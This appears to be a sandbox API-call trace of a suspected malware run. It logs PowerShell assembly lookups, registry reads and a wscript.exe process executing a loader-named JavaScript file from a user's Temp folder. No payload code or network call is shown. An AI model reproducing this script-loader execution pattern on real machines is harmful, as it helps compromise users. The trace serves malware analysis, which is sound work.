	[0241.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.238] VirtualQuery (in: lpAddress=0x12bbd0, lpBuffer=0x12ca90, dwLength=0x30 | out: lpBuffer=0x12ca90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0248.243] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0248.243] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.243] CoTaskMemFree (pv=0x221840) 
	[0248.299] VirtualQuery (in: lpAddress=0x12bbd0, lpBuffer=0x12ca90, dwLength=0x30 | out: lpBuffer=0x12ca90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0248.315] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0248.315] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.315] CoTaskMemFree (pv=0x221840) 
	[0248.318] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0248.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.318] CoTaskMemFree (pv=0x221840) 
	[0248.321] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0248.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.321] CoTaskMemFree (pv=0x221840) 
	[0248.327] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0248.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.327] CoTaskMemFree (pv=0x221840) 
	[0248.332] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0248.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.332] CoTaskMemFree (pv=0x221840) 
	[0248.333] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0248.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.334] CoTaskMemFree (pv=0x221840) 
	[0248.424] VirtualQuery (in: lpAddress=0x12bbd0, lpBuffer=0x12ca90, dwLength=0x30 | out: lpBuffer=0x12ca90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0248.428] VirtualQuery (in: lpAddress=0x12bbd0, lpBuffer=0x12ca90, dwLength=0x30 | out: lpBuffer=0x12ca90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.055] VirtualQuery (in: lpAddress=0x12bbd0, lpBuffer=0x12ca90, dwLength=0x30 | out: lpBuffer=0x12ca90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.312] CoTaskMemFree (pv=0x221840) 
	[0252.251] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x221950
	[0258.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.560] CoTaskMemFree (pv=0x221b70) 
	[0259.481] CoTaskMemAlloc (cb=0x104) returned 0x221b70
	[0259.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.481] CoTaskMemFree (pv=0x221b70) 
	[0259.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74

Thread:
	id = 259
	os_tid = 0x644


Thread:
	id = 260
	os_tid = 0x248


Thread:
	id = 261
	os_tid = 0x89c


Thread:
	id = 262
	os_tid = 0x210


Thread:
	id = 266
	os_tid = 0x7b8


Thread:
	id = 267
	os_tid = 0x9ac

	[0103.006] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0149.353] RegCloseKey (hKey=0x31c) returned 0x0
	[0149.353] LocalFree (hMem=0x1738f0) returned 0x0
	[0149.353] CloseHandle (hObject=0x320) returned 1
	[0149.353] CloseHandle (hObject=0x13) returned 1
	[0149.354] CloseHandle (hObject=0xf) returned 1
	[0149.354] RegCloseKey (hKey=0x30c) returned 0x0
	[0149.679] RegCloseKey (hKey=0x308) returned 0x0
	[0149.679] RegCloseKey (hKey=0x304) returned 0x0
	[0149.680] LocalFree (hMem=0x1738c0) returned 0x0
	[0181.124] RegCloseKey (hKey=0x308) returned 0x0
	[0217.574] RegCloseKey (hKey=0x35c) returned 0x0
	[0217.574] RegCloseKey (hKey=0x358) returned 0x0
	[0217.575] RegCloseKey (hKey=0x354) returned 0x0
	[0217.575] RegCloseKey (hKey=0x350) returned 0x0
	[0217.575] RegCloseKey (hKey=0x34c) returned 0x0
	[0217.575] RegCloseKey (hKey=0x348) returned 0x0
	[0217.575] RegCloseKey (hKey=0x344) returned 0x0
	[0217.576] RegCloseKey (hKey=0x36c) returned 0x0
	[0217.576] RegCloseKey (hKey=0x334) returned 0x0
	[0217.576] RegCloseKey (hKey=0x330) returned 0x0
	[0217.576] RegCloseKey (hKey=0x32c) returned 0x0
	[0217.577] RegCloseKey (hKey=0x328) returned 0x0
	[0217.577] RegCloseKey (hKey=0x324) returned 0x0
	[0217.577] RegCloseKey (hKey=0x2e4) returned 0x0
	[0217.577] RegCloseKey (hKey=0x30c) returned 0x0
	[0217.577] RegCloseKey (hKey=0x368) returned 0x0
	[0217.577] RegCloseKey (hKey=0x160) returned 0x0
	[0217.578] RegCloseKey (hKey=0x308) returned 0x0
	[0217.578] RegCloseKey (hKey=0x364) returned 0x0
	[0217.578] RegCloseKey (hKey=0x340) returned 0x0
	[0217.578] RegCloseKey (hKey=0x370) returned 0x0
	[0252.725] RegCloseKey (hKey=0x30c) returned 0x0
	[0252.725] RegCloseKey (hKey=0x368) returned 0x0
	[0252.725] RegCloseKey (hKey=0x160) returned 0x0
	[0252.725] RegCloseKey (hKey=0x308) returned 0x0
	[0252.726] RegCloseKey (hKey=0x364) returned 0x0
	[0252.726] RegCloseKey (hKey=0x360) returned 0x0
	[0252.726] RegCloseKey (hKey=0x2e4) returned 0x0
	[0252.726] RegCloseKey (hKey=0x370) returned 0x0

Process:
	id = "33"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0x585ce000"
	os_pid = "0xb6c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 264
	os_tid = 0xb9c

	[0103.020] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x15fe20 | out: lpSystemTimeAsFileTime=0x15fe20*(dwLowDateTime=0xb5b138b0, dwHighDateTime=0x1d543d1)) 
	[0103.020] GetCurrentProcessId () returned 0xb6c
	[0103.020] GetCurrentThreadId () returned 0xb9c
	[0103.020] GetTickCount () returned 0x2a3ec
	[0103.020] QueryPerformanceCounter (in: lpPerformanceCount=0x15fe28 | out: lpPerformanceCount=0x15fe28*=22744582169) returned 1
	[0103.020] GetStartupInfoA (in: lpStartupInfo=0x15fe40 | out: lpStartupInfo=0x15fe40*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0103.020] GetModuleHandleA (lpModuleName=0x0) returned 0xffa90000
	[0103.020] GetModuleHandleA (lpModuleName=0x0) returned 0xffa90000
	[0103.020] GetVersionExA (in: lpVersionInformation=0x15fd60*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x241eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x15fd60*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0103.020] GetUserDefaultLCID () returned 0x409
	[0103.021] CoInitialize (pvReserved=0x0) returned 0x0
	[0103.268] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0103.269] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0103.269] ??2@YAPEAX_K@Z () returned 0x4257b0
	[0103.269] ??2@YAPEAX_K@Z () returned 0x425f60
	[0103.269] GetCurrentThreadId () returned 0xb9c
	[0103.269] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x15faa8 | out: phkResult=0x15faa8*=0x7c) returned 0x0
	[0103.269] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x15faa0 | out: phkResult=0x15faa0*=0x80) returned 0x0
	[0103.269] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x15eda8, lpData=0x15f1b0, lpcbData=0x15eda0*=0x400 | out: lpType=0x15eda8*=0x0, lpData=0x15f1b0*=0x67, lpcbData=0x15eda0*=0x400) returned 0x2
	[0103.269] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x15eda8, lpData=0x15f1b0, lpcbData=0x15eda0*=0x400 | out: lpType=0x15eda8*=0x0, lpData=0x15f1b0*=0x67, lpcbData=0x15eda0*=0x400) returned 0x2
	[0103.269] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x15eda8, lpData=0x15f1b0, lpcbData=0x15eda0*=0x400 | out: lpType=0x15eda8*=0x0, lpData=0x15f1b0*=0x67, lpcbData=0x15eda0*=0x400) returned 0x2
	[0103.269] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0103.768] RegCloseKey (hKey=0x80) returned 0x0
	[0103.768] RegCloseKey (hKey=0x7c) returned 0x0
	[0103.768] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x15f7c0 | out: phkResult=0x15f7c0*=0x7c) returned 0x0
	[0103.768] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x15f7b8 | out: phkResult=0x15f7b8*=0x80) returned 0x0
	[0103.768] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x15eac8, lpData=0x15eed0, lpcbData=0x15eac0*=0x400 | out: lpType=0x15eac8*=0x0, lpData=0x15eed0*=0x0, lpcbData=0x15eac0*=0x400) returned 0x2
	[0103.768] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x15eac8, lpData=0x15eed0, lpcbData=0x15eac0*=0x400 | out: lpType=0x15eac8*=0x0, lpData=0x15eed0*=0x0, lpcbData=0x15eac0*=0x400) returned 0x2
	[0103.768] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x15eac8, lpData=0x15eed0, lpcbData=0x15eac0*=0x400 | out: lpType=0x15eac8*=0x0, lpData=0x15eed0*=0x0, lpcbData=0x15eac0*=0x400) returned 0x2
	[0103.768] RegCloseKey (hKey=0x80) returned 0x0
	[0103.768] RegCloseKey (hKey=0x7c) returned 0x0
	[0103.768] GetACP () returned 0x4e4
	[0103.768] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0103.768] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0103.768] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0103.769] FreeLibrary (hLibModule=0x77040000) returned 1
	[0103.769] ??2@YAPEAX_K@Z () returned 0x425f80
	[0103.769] CoRegisterMessageFilter (in: lpMessageFilter=0x425f80, lplpMessageFilter=0x425f90 | out: lplpMessageFilter=0x425f90*=0x0) returned 0x0
	[0103.769] GetModuleFileNameW (in: hModule=0xffa90000, lpFilename=0x15fb00, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0103.770] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x15f450 | out: lpdwHandle=0x15f450) returned 0x704
	[0103.770] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x15ed40 | out: lpData=0x15ed40) returned 1
	[0103.770] VerQueryValueW (in: pBlock=0x15ed40, lpSubBlock="\\", lplpBuffer=0x15f458, puLen=0x15f454 | out: lplpBuffer=0x15f458*=0x15ed68, puLen=0x15f454) returned 1
	[0103.770] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x15f4a8 | out: phkResult=0x15f4a8*=0x7c) returned 0x0
	[0103.770] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x15e7f8, lpData=0x15ec00, lpcbData=0x15e7f0*=0x400 | out: lpType=0x15e7f8*=0x0, lpData=0x15ec00*=0x0, lpcbData=0x15e7f0*=0x400) returned 0x2
	[0103.770] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x15f460 | out: phkResult=0x15f460*=0x80) returned 0x0
	[0103.770] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x15f424, lpData=0x15f4a0, lpcbData=0x15f420*=0x4 | out: lpType=0x15f424*=0x0, lpData=0x15f4a0*=0xd0, lpcbData=0x15f420*=0x4) returned 0x2
	[0103.770] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x15e7f8, lpData=0x15ec00, lpcbData=0x15e7f0*=0x400 | out: lpType=0x15e7f8*=0x0, lpData=0x15ec00*=0x0, lpcbData=0x15e7f0*=0x400) returned 0x2
	[0103.770] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x15f424, lpData=0x15f4a0, lpcbData=0x15f420*=0x4 | out: lpType=0x15f424*=0x0, lpData=0x15f4a0*=0xd0, lpcbData=0x15f420*=0x4) returned 0x2
	[0103.770] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x15e7f8, lpData=0x15ec00, lpcbData=0x15e7f0*=0x400 | out: lpType=0x15e7f8*=0x1, lpData="1", lpcbData=0x15e7f0*=0x4) returned 0x0
	[0103.770] lstrlenW (lpString="1") returned 1
	[0103.771] lstrlenW (lpString="0") returned 1
	[0103.771] lstrlenW (lpString="1") returned 1
	[0103.771] lstrlenW (lpString="no") returned 2
	[0103.771] lstrlenW (lpString="1") returned 1
	[0103.771] lstrlenW (lpString="false") returned 5
	[0103.771] RegCloseKey (hKey=0x80) returned 0x0
	[0103.771] RegCloseKey (hKey=0x7c) returned 0x0
	[0103.771] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x15f4a8, lpdwDisposition=0x0 | out: phkResult=0x15f4a8*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0103.771] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x15f444, lpData=0x15f4a0, lpcbData=0x15f440*=0x4 | out: lpType=0x15f444*=0x0, lpData=0x15f4a0*=0xd0, lpcbData=0x15f440*=0x4) returned 0x2
	[0103.771] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x15e818, lpData=0x15ec20, lpcbData=0x15e810*=0x400 | out: lpType=0x15e818*=0x1, lpData="1", lpcbData=0x15e810*=0x4) returned 0x0
	[0103.771] lstrlenW (lpString="1") returned 1
	[0103.771] lstrlenW (lpString="0") returned 1
	[0103.771] lstrlenW (lpString="1") returned 1
	[0103.771] lstrlenW (lpString="no") returned 2
	[0103.771] lstrlenW (lpString="1") returned 1
	[0103.771] lstrlenW (lpString="false") returned 5
	[0103.771] RegCloseKey (hKey=0x7c) returned 0x0
	[0103.771] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x15f4a8, lpdwDisposition=0x0 | out: phkResult=0x15f4a8*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0103.771] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x15f444, lpData=0x15f4a0, lpcbData=0x15f440*=0x4 | out: lpType=0x15f444*=0x0, lpData=0x15f4a0*=0xd0, lpcbData=0x15f440*=0x4) returned 0x2
	[0103.771] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x15e818, lpData=0x15ec20, lpcbData=0x15e810*=0x400 | out: lpType=0x15e818*=0x0, lpData=0x15ec20*=0x31, lpcbData=0x15e810*=0x400) returned 0x2
	[0103.771] RegCloseKey (hKey=0x7c) returned 0x0
	[0103.771] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0103.771] lstrlenW (lpString="js") returned 2
	[0103.771] lstrlenW (lpString="WSH") returned 3
	[0103.771] ??2@YAPEAX_K@Z () returned 0x425870
	[0103.772] LoadStringW (in: hInstance=0xffa90000, uID=0x9c5, lpBuffer=0x15df10, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
